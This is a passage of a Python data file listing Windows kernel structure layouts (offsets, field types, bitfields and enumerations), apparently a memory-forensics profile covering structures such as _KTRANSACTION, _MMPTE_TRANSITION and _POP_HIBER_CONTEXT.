'BaseLsn' : [ 0x178, ['_CLS_LSN']],
'CurrentReadLsn' : [ 0x180, ['_CLS_LSN']],
'LastRecoveredLsn' : [ 0x188, ['_CLS_LSN']],
'TmRmHandle' : [ 0x190, ['pointer', ['void']]],
'TmRm' : [ 0x194, ['pointer', ['_KRESOURCEMANAGER']]],
'LogFullNotifyEvent' : [ 0x198, ['_KEVENT']],
'CheckpointWorkItem' : [ 0x1a8, ['_WORK_QUEUE_ITEM']],
'CheckpointTargetLsn' : [ 0x1b8, ['_CLS_LSN']],
'LogFullCompletedWorkItem' : [ 0x1c0, ['_WORK_QUEUE_ITEM']],
'LogWriteResource' : [ 0x1d0, ['_ERESOURCE']],
'LogFlags' : [ 0x208, ['unsigned long']],
'LogFullStatus' : [ 0x20c, ['long']],
'RecoveryStatus' : [ 0x210, ['long']],
'LastCheckBaseLsn' : [ 0x218, ['_CLS_LSN']],
'RestartOrderedList' : [ 0x220, ['_LIST_ENTRY']],
'OfflineWorkItem' : [ 0x228, ['_WORK_QUEUE_ITEM']],
} ],
'_CONFIGURATION_COMPONENT' : [ 0x24, {
'Class' : [ 0x0, ['Enumeration', dict(target = 'long', choices = {0: 'SystemClass', 1: 'ProcessorClass', 2: 'CacheClass', 3: 'AdapterClass', 4: 'ControllerClass', 5: 'PeripheralClass', 6: 'MemoryClass', 7: 'MaximumClass'})]],
'Type' : [ 0x4, ['Enumeration', dict(target = 'long', choices = {0: 'ArcSystem', 1: 'CentralProcessor', 2: 'FloatingPointProcessor', 3: 'PrimaryIcache', 4: 'PrimaryDcache', 5: 'SecondaryIcache', 6: 'SecondaryDcache', 7: 'SecondaryCache', 8: 'EisaAdapter', 9: 'TcAdapter', 10: 'ScsiAdapter', 11: 'DtiAdapter', 12: 'MultiFunctionAdapter', 13: 'DiskController', 14: 'TapeController', 15: 'CdromController', 16: 'WormController', 17: 'SerialController', 18: 'NetworkController', 19: 'DisplayController', 20: 'ParallelController', 21: 'PointerController', 22: 'KeyboardController', 23: 'AudioController', 24: 'OtherController', 25: 'DiskPeripheral', 26: 'FloppyDiskPeripheral', 27: 'TapePeripheral', 28: 'ModemPeripheral', 29: 'MonitorPeripheral', 30: 'PrinterPeripheral', 31: 'PointerPeripheral', 32: 'KeyboardPeripheral', 33: 'TerminalPeripheral', 34: 'OtherPeripheral', 35: 'LinePeripheral', 36: 'NetworkPeripheral', 37: 'SystemMemory', 38: 'DockingInformation', 39: 'RealModeIrqRoutingTable', 40: 'RealModePCIEnumeration', 41: 'MaximumType'})]],
'Flags' : [ 0x8, ['_DEVICE_FLAGS']],
'Version' : [ 0xc, ['unsigned short']],
'Revision' : [ 0xe, ['unsigned short']],
'Key' : [ 0x10, ['unsigned long']],
'AffinityMask' : [ 0x14, ['unsigned long']],
'Group' : [ 0x14, ['unsigned short']],
'GroupIndex' : [ 0x16, ['unsigned short']],
'ConfigurationDataLength' : [ 0x18, ['unsigned long']],
'IdentifierLength' : [ 0x1c, ['unsigned long']],
'Identifier' : [ 0x20, ['pointer', ['unsigned char']]],
} ],
'_VF_BTS_RECORD' : [ 0xc, {
'JumpedFrom' : [ 0x0, ['pointer', ['void']]],
'JumpedTo' : [ 0x4, ['pointer', ['void']]],
'Unused1' : [ 0x8, ['BitField', dict(start_bit = 0, end_bit = 3, native_type='unsigned long')]],
'Predicted' : [ 0x8, ['BitField', dict(start_bit = 3, end_bit = 7, native_type='unsigned long')]],
'Unused2' : [ 0x8, ['BitField', dict(start_bit = 7, end_bit = 32, native_type='unsigned long')]],
} ],
'_KTRANSACTION' : [ 0x1e0, {
'OutcomeEvent' : [ 0x0, ['_KEVENT']],
'cookie' : [ 0x10, ['unsigned long']],
'Mutex' : [ 0x14, ['_KMUTANT']],
'TreeTx' : [ 0x34, ['pointer', ['_KTRANSACTION']]],
'GlobalNamespaceLink' : [ 0x38, ['_KTMOBJECT_NAMESPACE_LINK']],
'TmNamespaceLink' : [ 0x4c, ['_KTMOBJECT_NAMESPACE_LINK']],
'UOW' : [ 0x60, ['_GUID']],
'State' : [ 0x70, ['Enumeration', dict(target = 'long', choices = {0: 'KTransactionUninitialized', 1: 'KTransactionActive', 2: 'KTransactionPreparing', 3: 'KTransactionPrepared', 4: 'KTransactionInDoubt', 5: 'KTransactionCommitted', 6: 'KTransactionAborted', 7: 'KTransactionDelegated', 8: 'KTransactionPrePreparing', 9: 'KTransactionForgotten', 10: 'KTransactionRecovering', 11: 'KTransactionPrePrepared'})]],
'Flags' : [ 0x74, ['unsigned long']],
'EnlistmentHead' : [ 0x78, ['_LIST_ENTRY']],
'EnlistmentCount' : [ 0x80, ['unsigned long']],
'RecoverableEnlistmentCount' : [ 0x84, ['unsigned long']],
'PrePrepareRequiredEnlistmentCount' : [ 0x88, ['unsigned long']],
'PrepareRequiredEnlistmentCount' : [ 0x8c, ['unsigned long']],
'OutcomeRequiredEnlistmentCount' : [ 0x90, ['unsigned long']],
'PendingResponses' : [ 0x94, ['unsigned long']],
'SuperiorEnlistment' : [ 0x98, ['pointer', ['_KENLISTMENT']]],
'LastLsn' : [ 0xa0, ['_CLS_LSN']],
'PromotedEntry' : [ 0xa8, ['_LIST_ENTRY']],
'PromoterTransaction' : [ 0xb0, ['pointer', ['_KTRANSACTION']]],
'PromotePropagation' : [ 0xb4, ['pointer', ['void']]],
'IsolationLevel' : [ 0xb8, ['unsigned long']],
'IsolationFlags' : [ 0xbc, ['unsigned long']],
'Timeout' : [ 0xc0, ['_LARGE_INTEGER']],
'Description' : [ 0xc8, ['_UNICODE_STRING']],
'RollbackThread' : [ 0xd0, ['pointer', ['_KTHREAD']]],
'RollbackWorkItem' : [ 0xd4, ['_WORK_QUEUE_ITEM']],
'RollbackDpc' : [ 0xe4, ['_KDPC']],
'RollbackTimer' : [ 0x108, ['_KTIMER']],
'LsnOrderedEntry' : [ 0x130, ['_LIST_ENTRY']],
'Outcome' : [ 0x138, ['Enumeration', dict(target = 'long', choices = {0: 'KTxOutcomeUninitialized', 1: 'KTxOutcomeUndetermined', 2: 'KTxOutcomeCommitted', 3: 'KTxOutcomeAborted', 4: 'KTxOutcomeUnavailable'})]],
'Tm' : [ 0x13c, ['pointer', ['_KTM']]],
'CommitReservation' : [ 0x140, ['long long']],
'TransactionHistory' : [ 0x148, ['array', 10, ['_KTRANSACTION_HISTORY']]],
'TransactionHistoryCount' : [ 0x198, ['unsigned long']],
'DTCPrivateInformation' : [ 0x19c, ['pointer', ['void']]],
'DTCPrivateInformationLength' : [ 0x1a0, ['unsigned long']],
'DTCPrivateInformationMutex' : [ 0x1a4, ['_KMUTANT']],
'PromotedTxSelfHandle' : [ 0x1c4, ['pointer', ['void']]],
'PendingPromotionCount' : [ 0x1c8, ['unsigned long']],
'PromotionCompletedEvent' : [ 0x1cc, ['_KEVENT']],
} ],
'_PRIVATE_CACHE_MAP_FLAGS' : [ 0x4, {
'DontUse' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 16, native_type='unsigned long')]],
'ReadAheadActive' : [ 0x0, ['BitField', dict(start_bit = 16, end_bit = 17, native_type='unsigned long')]],
'ReadAheadEnabled' : [ 0x0, ['BitField', dict(start_bit = 17, end_bit = 18, native_type='unsigned long')]],
'PagePriority' : [ 0x0, ['BitField', dict(start_bit = 18, end_bit = 21, native_type='unsigned long')]],
'Available' : [ 0x0, ['BitField', dict(start_bit = 21, end_bit = 32, native_type='unsigned long')]],
} ],
'_CM_KCB_UOW' : [ 0x38, {
'TransactionListEntry' : [ 0x0, ['_LIST_ENTRY']],
'KCBLock' : [ 0x8, ['pointer', ['_CM_INTENT_LOCK']]],
'KeyLock' : [ 0xc, ['pointer', ['_CM_INTENT_LOCK']]],
'KCBListEntry' : [ 0x10, ['_LIST_ENTRY']],
'KeyControlBlock' : [ 0x18, ['pointer', ['_CM_KEY_CONTROL_BLOCK']]],
'Transaction' : [ 0x1c, ['pointer', ['_CM_TRANS']]],
'UoWState' : [ 0x20, ['unsigned long']],
'ActionType' : [ 0x24, ['Enumeration', dict(target = 'long', choices = {0: 'UoWAddThisKey', 1: 'UoWAddChildKey', 2: 'UoWDeleteThisKey', 3: 'UoWDeleteChildKey', 4: 'UoWSetValueNew', 5: 'UoWSetValueExisting', 6: 'UoWDeleteValue', 7: 'UoWSetKeyUserFlags', 8: 'UoWSetLastWriteTime', 9: 'UoWSetSecurityDescriptor', 10: 'UoWRenameSubKey', 11: 'UoWRenameOldSubKey', 12: 'UoWRenameNewSubKey', 13: 'UoWIsolation', 14: 'UoWInvalid'})]],
'StorageType' : [ 0x28, ['Enumeration', dict(target = 'long', choices = {0: 'Stable', 1: 'Volatile', 2: 'InvalidStorage'})]],
'ChildKCB' : [ 0x30, ['pointer', ['_CM_KEY_CONTROL_BLOCK']]],
'VolatileKeyCell' : [ 0x30, ['unsigned long']],
'OldValueCell' : [ 0x30, ['unsigned long']],
'NewValueCell' : [ 0x34, ['unsigned long']],
'UserFlags' : [ 0x30, ['unsigned long']],
'LastWriteTime' : [ 0x30, ['_LARGE_INTEGER']],
'TxSecurityCell' : [ 0x30, ['unsigned long']],
'OldChildKCB' : [ 0x30, ['pointer', ['_CM_KEY_CONTROL_BLOCK']]],
'NewChildKCB' : [ 0x34, ['pointer', ['_CM_KEY_CONTROL_BLOCK']]],
'OtherChildKCB' : [ 0x30, ['pointer', ['_CM_KEY_CONTROL_BLOCK']]],
'ThisVolatileKeyCell' : [ 0x34, ['unsigned long']],
} ],
'_KPROCESSOR_STATE' : [ 0x320, {
'ContextFrame' : [ 0x0, ['_CONTEXT']],
'SpecialRegisters' : [ 0x2cc, ['_KSPECIAL_REGISTERS']],
} ],
'_MMPTE_TRANSITION' : [ 0x4, {
'Valid' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'Write' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'Owner' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'WriteThrough' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'CacheDisable' : [ 0x0, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned long')]],
'Protection' : [ 0x0, ['BitField', dict(start_bit = 5, end_bit = 10, native_type='unsigned long')]],
'Prototype' : [ 0x0, ['BitField', dict(start_bit = 10, end_bit = 11, native_type='unsigned long')]],
'Transition' : [ 0x0, ['BitField', dict(start_bit = 11, end_bit = 12, native_type='unsigned long')]],
'PageFrameNumber' : [ 0x0, ['BitField', dict(start_bit = 12, end_bit = 32, native_type='unsigned long')]],
} ],
'_VF_WATCHDOG_IRP' : [ 0x14, {
'ListEntry' : [ 0x0, ['_LIST_ENTRY']],
'Irp' : [ 0x8, ['pointer', ['_IRP']]],
'DueTickCount' : [ 0xc, ['unsigned long']],
'Inserted' : [ 0x10, ['unsigned char']],
'TrackedStackLocation' : [ 0x11, ['unsigned char']],
'CancelTimeoutTicks' : [ 0x12, ['unsigned short']],
} ],
'_flags' : [ 0x1, {
'Removable' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned char')]],
'GroupAssigned' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned char')]],
'GroupCommitted' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned char')]],
'GroupAssignmentFixed' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned char')]],
'Fill' : [ 0x0, ['BitField', dict(start_bit = 4, end_bit = 8, native_type='unsigned char')]],
} ],
'__unnamed_2270' : [ 0x8, {
'Head' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 24, native_type='unsigned long long')]],
'Tail' : [ 0x0, ['BitField', dict(start_bit = 24, end_bit = 48, native_type='unsigned long long')]],
'ActiveThreadCount' : [ 0x0, ['BitField', dict(start_bit = 48, end_bit = 64, native_type='unsigned long long')]],
} ],
'__unnamed_2272' : [ 0x8, {
's1' : [ 0x0, ['__unnamed_2270']],
'Value' : [ 0x0, ['unsigned long long']],
} ],
'_ALPC_COMPLETION_LIST_STATE' : [ 0x8, {
'u1' : [ 0x0, ['__unnamed_2272']],
} ],
'_PSP_CPU_SHARE_CAPTURED_WEIGHT_DATA' : [ 0x8, {
'CapturedCpuShareWeight' : [ 0x0, ['unsigned long']],
'CapturedTotalWeight' : [ 0x4, ['unsigned long']],
'CombinedData' : [ 0x0, ['long long']],
} ],
'_CM_NAME_HASH' : [ 0xc, {
'ConvKey' : [ 0x0, ['unsigned long']],
'NextHash' : [ 0x4, ['pointer', ['_CM_NAME_HASH']]],
'NameLength' : [ 0x8, ['unsigned short']],
'Name' : [ 0xa, ['array', 1, ['wchar']]],
} ],
'_PROC_IDLE_STATE_BUCKET' : [ 0x20, {
'TotalTime' : [ 0x0, ['unsigned long long']],
'MinTime' : [ 0x8, ['unsigned long long']],
'MaxTime' : [ 0x10, ['unsigned long long']],
'Count' : [ 0x18, ['unsigned long']],
} ],
'_MMSECURE_FLAGS' : [ 0x4, {
'ReadOnly' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'NoWrite' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'Spare' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 12, native_type='unsigned long')]],
} ],
'_PO_IRP_QUEUE' : [ 0x8, {
'CurrentIrp' : [ 0x0, ['pointer', ['_IRP']]],
'PendingIrpList' : [ 0x4, ['pointer', ['_IRP']]],
} ],
'__unnamed_2285' : [ 0x4, {
'Active' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'OnlyTryAcquireUsed' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'ReleasedOutOfOrder' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'SequenceNumber' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 32, native_type='unsigned long')]],
'Whole' : [ 0x0, ['unsigned long']],
} ],
'_VI_DEADLOCK_NODE' : [ 0x6c, {
'Parent' : [ 0x0, ['pointer', ['_VI_DEADLOCK_NODE']]],
'ChildrenList' : [ 0x4, ['_LIST_ENTRY']],
'SiblingsList' : [ 0xc, ['_LIST_ENTRY']],
'ResourceList' : [ 0x14, ['_LIST_ENTRY']],
'FreeListEntry' : [ 0x14, ['_LIST_ENTRY']],
'Root' : [ 0x1c, ['pointer', ['_VI_DEADLOCK_RESOURCE']]],
'ThreadEntry' : [ 0x20, ['pointer', ['_VI_DEADLOCK_THREAD']]],
'u1' : [ 0x24, ['__unnamed_2285']],
'ChildrenCount' : [ 0x28, ['long']],
'StackTrace' : [ 0x2c, ['array', 8, ['pointer', ['void']]]],
'ParentStackTrace' : [ 0x4c, ['array', 8, ['pointer', ['void']]]],
} ],
'PROCESSOR_IDLESTATE_INFO' : [ 0x8, {
'TimeCheck' : [ 0x0, ['unsigned long']],
'DemotePercent' : [ 0x4, ['unsigned char']],
'PromotePercent' : [ 0x5, ['unsigned char']],
'Spare' : [ 0x6, ['array', 2, ['unsigned char']]],
} ],
'_KTMOBJECT_NAMESPACE' : [ 0x60, {
'Table' : [ 0x0, ['_RTL_AVL_TABLE']],
'Mutex' : [ 0x38, ['_KMUTANT']],
'LinksOffset' : [ 0x58, ['unsigned short']],
'GuidOffset' : [ 0x5a, ['unsigned short']],
'Expired' : [ 0x5c, ['unsigned char']],
} ],
'_LPCP_PORT_QUEUE' : [ 0x10, {
'NonPagedPortQueue' : [ 0x0, ['pointer', ['_LPCP_NONPAGED_PORT_QUEUE']]],
'Semaphore' : [ 0x4, ['pointer', ['_KSEMAPHORE']]],
'ReceiveHead' : [ 0x8, ['_LIST_ENTRY']],
} ],
'_CM_KEY_REFERENCE' : [ 0x8, {
'KeyCell' : [ 0x0, ['unsigned long']],
'KeyHive' : [ 0x4, ['pointer', ['_HHIVE']]],
} ],
'SYSTEM_POWER_LEVEL' : [ 0x18, {
'Enable' : [ 0x0, ['unsigned char']],
'Spare' : [ 0x1, ['array', 3, ['unsigned char']]],
'BatteryLevel' : [ 0x4, ['unsigned long']],
'PowerPolicy' : [ 0x8, ['POWER_ACTION_POLICY']],
'MinSystemState' : [ 0x14, ['Enumeration', dict(target = 'long', choices = {0: 'PowerSystemUnspecified', 1: 'PowerSystemWorking', 2: 'PowerSystemSleeping1', 3: 'PowerSystemSleeping2', 4: 'PowerSystemSleeping3', 5: 'PowerSystemHibernate', 6: 'PowerSystemShutdown', 7: 'PowerSystemMaximum'})]],
} ],
'_OBJECT_DUMP_CONTROL' : [ 0x8, {
'Stream' : [ 0x0, ['pointer', ['void']]],
'Detail' : [ 0x4, ['unsigned long']],
} ],
'_VF_ADDRESS_RANGE' : [ 0x8, {
'Start' : [ 0x0, ['pointer', ['unsigned char']]],
'End' : [ 0x4, ['pointer', ['unsigned char']]],
} ],
'_OBJECT_SYMBOLIC_LINK' : [ 0x18, {
'CreationTime' : [ 0x0, ['_LARGE_INTEGER']],
'LinkTarget' : [ 0x8, ['_UNICODE_STRING']],
'DosDeviceDriveIndex' : [ 0x10, ['unsigned long']],
} ],
'_LPCP_NONPAGED_PORT_QUEUE' : [ 0x18, {
'Semaphore' : [ 0x0, ['_KSEMAPHORE']],
'BackPointer' : [ 0x14, ['pointer', ['_LPCP_PORT_OBJECT']]],
} ],
'_KRESOURCEMANAGER_COMPLETION_BINDING' : [ 0x14, {
'NotificationListHead' : [ 0x0, ['_LIST_ENTRY']],
'Port' : [ 0x8, ['pointer', ['void']]],
'Key' : [ 0xc, ['unsigned long']],
'BindingProcess' : [ 0x10, ['pointer', ['_EPROCESS']]],
} ],
'_VF_TRACKER' : [ 0x10, {
'TrackerFlags' : [ 0x0, ['unsigned long']],
'TrackerSize' : [ 0x4, ['unsigned long']],
'TrackerIndex' : [ 0x8, ['unsigned long']],
'TraceDepth' : [ 0xc, ['unsigned long']],
} ],
'_CALL_PERFORMANCE_DATA' : [ 0x204, {
'SpinLock' : [ 0x0, ['unsigned long']],
'HashTable' : [ 0x4, ['array', 64, ['_LIST_ENTRY']]],
} ],
'_ARBITER_ALTERNATIVE' : [ 0x38, {
'Minimum' : [ 0x0, ['unsigned long long']],
'Maximum' : [ 0x8, ['unsigned long long']],
'Length' : [ 0x10, ['unsigned long long']],
'Alignment' : [ 0x18, ['unsigned long long']],
'Priority' : [ 0x20, ['long']],
'Flags' : [ 0x24, ['unsigned long']],
'Descriptor' : [ 0x28, ['pointer', ['_IO_RESOURCE_DESCRIPTOR']]],
'Reserved' : [ 0x2c, ['array', 3, ['unsigned long']]],
} ],
'_WHEA_ERROR_STATUS' : [ 0x8, {
'ErrorStatus' : [ 0x0, ['unsigned long long']],
'Reserved1' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 8, native_type='unsigned long long')]],
'ErrorType' : [ 0x0, ['BitField', dict(start_bit = 8, end_bit = 16, native_type='unsigned long long')]],
'Address' : [ 0x0, ['BitField', dict(start_bit = 16, end_bit = 17, native_type='unsigned long long')]],
'Control' : [ 0x0, ['BitField', dict(start_bit = 17, end_bit = 18, native_type='unsigned long long')]],
'Data' : [ 0x0, ['BitField', dict(start_bit = 18, end_bit = 19, native_type='unsigned long long')]],
'Responder' : [ 0x0, ['BitField', dict(start_bit = 19, end_bit = 20, native_type='unsigned long long')]],
'Requester' : [ 0x0, ['BitField', dict(start_bit = 20, end_bit = 21, native_type='unsigned long long')]],
'FirstError' : [ 0x0, ['BitField', dict(start_bit = 21, end_bit = 22, native_type='unsigned long long')]],
'Overflow' : [ 0x0, ['BitField', dict(start_bit = 22, end_bit = 23, native_type='unsigned long long')]],
'Reserved2' : [ 0x0, ['BitField', dict(start_bit = 23, end_bit = 64, native_type='unsigned long long')]],
} ],
'_WHEA_PERSISTENCE_INFO' : [ 0x8, {
'Signature' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 16, native_type='unsigned long long')]],
'Length' : [ 0x0, ['BitField', dict(start_bit = 16, end_bit = 40, native_type='unsigned long long')]],
'Identifier' : [ 0x0, ['BitField', dict(start_bit = 40, end_bit = 56, native_type='unsigned long long')]],
'Attributes' : [ 0x0, ['BitField', dict(start_bit = 56, end_bit = 58, native_type='unsigned long long')]],
'DoNotLog' : [ 0x0, ['BitField', dict(start_bit = 58, end_bit = 59, native_type='unsigned long long')]],
'Reserved' : [ 0x0, ['BitField', dict(start_bit = 59, end_bit = 64, native_type='unsigned long long')]],
'AsULONGLONG' : [ 0x0, ['unsigned long long']],
} ],
'_MI_SECTION_IMAGE_INFORMATION' : [ 0x38, {
'ExportedImageInformation' : [ 0x0, ['_SECTION_IMAGE_INFORMATION']],
'InternalImageInformation' : [ 0x30, ['_MI_EXTRA_IMAGE_INFORMATION']],
} ],
'_HEAP_USERDATA_HEADER' : [ 0x10, {
'SFreeListEntry' : [ 0x0, ['_SINGLE_LIST_ENTRY']],
'SubSegment' : [ 0x0, ['pointer', ['_HEAP_SUBSEGMENT']]],
'Reserved' : [ 0x4, ['pointer', ['void']]],
'SizeIndex' : [ 0x8, ['unsigned long']],
'Signature' : [ 0xc, ['unsigned long']],
} ],
'_STACK_TABLE' : [ 0x8040, {
'NumStackTraces' : [ 0x0, ['unsigned short']],
'TraceCapacity' : [ 0x2, ['unsigned short']],
'StackTrace' : [ 0x4, ['array', 16, ['pointer', ['_OBJECT_REF_TRACE']]]],
'StackTableHash' : [ 0x44, ['array', 16381, ['unsigned short']]],
} ],
'_TOKEN_CONTROL' : [ 0x28, {
'TokenId' : [ 0x0, ['_LUID']],
'AuthenticationId' : [ 0x8, ['_LUID']],
'ModifiedId' : [ 0x10, ['_LUID']],
'TokenSource' : [ 0x18, ['_TOKEN_SOURCE']],
} ],
'_DEFERRED_WRITE' : [ 0x24, {
'NodeTypeCode' : [ 0x0, ['short']],
'NodeByteSize' : [ 0x2, ['short']],
'FileObject' : [ 0x4, ['pointer', ['_FILE_OBJECT']]],
'BytesToWrite' : [ 0x8, ['unsigned long']],
'DeferredWriteLinks' : [ 0xc, ['_LIST_ENTRY']],
'Event' : [ 0x14, ['pointer', ['_KEVENT']]],
'PostRoutine' : [ 0x18, ['pointer', ['void']]],
'Context1' : [ 0x1c, ['pointer', ['void']]],
'Context2' : [ 0x20, ['pointer', ['void']]],
} ],
'_ARBITER_ORDERING_LIST' : [ 0x8, {
'Count' : [ 0x0, ['unsigned short']],
'Maximum' : [ 0x2, ['unsigned short']],
'Orderings' : [ 0x4, ['pointer', ['_ARBITER_ORDERING']]],
} ],
'_SECTION_IMAGE_INFORMATION' : [ 0x30, {
'TransferAddress' : [ 0x0, ['pointer', ['void']]],
'ZeroBits' : [ 0x4, ['unsigned long']],
'MaximumStackSize' : [ 0x8, ['unsigned long']],
'CommittedStackSize' : [ 0xc, ['unsigned long']],
'SubSystemType' : [ 0x10, ['unsigned long']],
'SubSystemMinorVersion' : [ 0x14, ['unsigned short']],
'SubSystemMajorVersion' : [ 0x16, ['unsigned short']],
'SubSystemVersion' : [ 0x14, ['unsigned long']],
'GpValue' : [ 0x18, ['unsigned long']],
'ImageCharacteristics' : [ 0x1c, ['unsigned short']],
'DllCharacteristics' : [ 0x1e, ['unsigned short']],
'Machine' : [ 0x20, ['unsigned short']],
'ImageContainsCode' : [ 0x22, ['unsigned char']],
'ImageFlags' : [ 0x23, ['unsigned char']],
'ComPlusNativeReady' : [ 0x23, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned char')]],
'ComPlusILOnly' : [ 0x23, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned char')]],
'ImageDynamicallyRelocated' : [ 0x23, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned char')]],
'ImageMappedFlat' : [ 0x23, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned char')]],
'Reserved' : [ 0x23, ['BitField', dict(start_bit = 4, end_bit = 8, native_type='unsigned char')]],
'LoaderFlags' : [ 0x24, ['unsigned long']],
'ImageFileSize' : [ 0x28, ['unsigned long']],
'CheckSum' : [ 0x2c, ['unsigned long']],
} ],
'_VF_AVL_TABLE' : [ 0x3c, {
'RtlTable' : [ 0x0, ['_RTL_AVL_TABLE']],
'ReservedNode' : [ 0x38, ['pointer', ['_VF_AVL_TREE_NODE']]],
} ],
'_TOKEN_AUDIT_POLICY' : [ 0x1b, {
'PerUserPolicy' : [ 0x0, ['array', 27, ['unsigned char']]],
} ],
'__unnamed_22db' : [ 0x8, {
'EndingOffset' : [ 0x0, ['pointer', ['_LARGE_INTEGER']]],
'ResourceToRelease' : [ 0x4, ['pointer', ['pointer', ['_ERESOURCE']]]],
} ],
'__unnamed_22dd' : [ 0x4, {
'ResourceToRelease' : [ 0x0, ['pointer', ['_ERESOURCE']]],
} ],
'__unnamed_22e1' : [ 0x8, {
'SyncType' : [ 0x0, ['Enumeration', dict(target = 'long', choices = {0: 'SyncTypeOther', 1: 'SyncTypeCreateSection'})]],
'PageProtection' : [ 0x4, ['unsigned long']],
} ],
'__unnamed_22e5' : [ 0x8, {
'NotificationType' : [ 0x0, ['Enumeration', dict(target = 'long', choices = {0: 'NotifyTypeCreate', 1: 'NotifyTypeRetired'})]],
'SafeToRecurse' : [ 0x4, ['unsigned char']],
} ],
'__unnamed_22e7' : [ 0x14, {
'Argument1' : [ 0x0, ['pointer', ['void']]],
'Argument2' : [ 0x4, ['pointer', ['void']]],
'Argument3' : [ 0x8, ['pointer', ['void']]],
'Argument4' : [ 0xc, ['pointer', ['void']]],
'Argument5' : [ 0x10, ['pointer', ['void']]],
} ],
'_FS_FILTER_PARAMETERS' : [ 0x14, {
'AcquireForModifiedPageWriter' : [ 0x0, ['__unnamed_22db']],
'ReleaseForModifiedPageWriter' : [ 0x0, ['__unnamed_22dd']],
'AcquireForSectionSynchronization' : [ 0x0, ['__unnamed_22e1']],
'NotifyStreamFileObject' : [ 0x0, ['__unnamed_22e5']],
'Others' : [ 0x0, ['__unnamed_22e7']],
} ],
'_PROFILE_PARAMETER_BLOCK' : [ 0x10, {
'Status' : [ 0x0, ['unsigned short']],
'Reserved' : [ 0x2, ['unsigned short']],
'DockingState' : [ 0x4, ['unsigned short']],
'Capabilities' : [ 0x6, ['unsigned short']],
'DockID' : [ 0x8, ['unsigned long']],
'SerialNumber' : [ 0xc, ['unsigned long']],
} ],
'_COMPRESSED_DATA_INFO' : [ 0xc, {
'CompressionFormatAndEngine' : [ 0x0, ['unsigned short']],
'CompressionUnitShift' : [ 0x2, ['unsigned char']],
'ChunkShift' : [ 0x3, ['unsigned char']],
'ClusterShift' : [ 0x4, ['unsigned char']],
'Reserved' : [ 0x5, ['unsigned char']],
'NumberOfChunks' : [ 0x6, ['unsigned short']],
'CompressedChunkSizes' : [ 0x8, ['array', 1, ['unsigned long']]],
} ],
'_POP_HIBER_CONTEXT' : [ 0xa0, {
'WriteToFile' : [ 0x0, ['unsigned char']],
'ReserveLoaderMemory' : [ 0x1, ['unsigned char']],
'ReserveFreeMemory' : [ 0x2, ['unsigned char']],
'Reset' : [ 0x3, ['unsigned char']],
'HiberFlags' : [ 0x4, ['unsigned char']],
'WroteHiberFile' : [ 0x5, ['unsigned char']],
'MapFrozen' : [ 0x6, ['unsigned char']],
'MemoryMap' : [ 0x8, ['_RTL_BITMAP']],
'DiscardedMemoryPages' : [ 0x10, ['_RTL_BITMAP']],
'ClonedRanges' : [ 0x18, ['_LIST_ENTRY']],
'ClonedRangeCount' : [ 0x20, ['unsigned long']],
'NextCloneRange' : [ 0x24, ['pointer', ['_LIST_ENTRY']]],
'NextPreserve' : [ 0x28, ['unsigned long']],
'LoaderMdl' : [ 0x2c, ['pointer', ['_MDL']]],
'AllocatedMdl' : [ 0x30, ['pointer', ['_MDL']]],
'PagesOut' : [ 0x38, ['unsigned long long']],
'IoPages' : [ 0x40, ['pointer', ['void']]],
'IoPagesCount' : [ 0x44, ['unsigned long']],
'CurrentMcb' : [ 0x48, ['pointer', ['void']]],
'DumpStack' : [ 0x4c, ['pointer', ['_DUMP_STACK_CONTEXT']]],
'WakeState' : [ 0x50, ['pointer', ['_KPROCESSOR_STATE']]],
'PreferredIoWriteSize' : [ 0x54, ['unsigned long']],
'IoProgress' : [ 0x58, ['unsigned long']],
'HiberVa' : [ 0x5c, ['unsigned long']],
'HiberPte' : [ 0x60, ['_LARGE_INTEGER']],
'Status' : [ 0x68, ['long']],
'MemoryImage' : [ 0x6c, ['pointer', ['PO_MEMORY_IMAGE']]],
'CompressionWorkspace' : [ 0x70, ['pointer', ['void']]],
'CompressedWriteBuffer' : [ 0x74, ['pointer', ['unsigned char']]],
'CompressedWriteBufferSize' : [ 0x78, ['unsigned long']],
'MaxCompressedOutputSize' : [ 0x7c, ['unsigned long']],
'PerformanceStats' : [ 0x80, ['pointer', ['unsigned long']]],
'CompressionBlock' : [ 0x84, ['pointer', ['void']]],
'DmaIO' : [ 0x88, ['pointer', ['void']]],
'TemporaryHeap' : [ 0x8c, ['pointer', ['void']]],
'BootLoaderLogMdl' : [ 0x90, ['pointer', ['_MDL']]],
'FirmwareRuntimeInformationMdl' : [ 0x94, ['pointer', ['_MDL']]],
'ResumeContext' : [ 0x98, ['pointer', ['void']]],
'ResumeContextPages' : [ 0x9c, ['unsigned long']],
} ],
'_OBJECT_REF_TRACE' : [ 0x40, {
'StackTrace' : [ 0x0, ['array', 16, ['pointer', ['void']]]],
} ],
'_OBJECT_NAME_INFORMATION' : [ 0x8, {
'Name' : [ 0x0, ['_UNICODE_STRING']],
} ],
'_PCW_COUNTER_INFORMATION' : [ 0x10, {
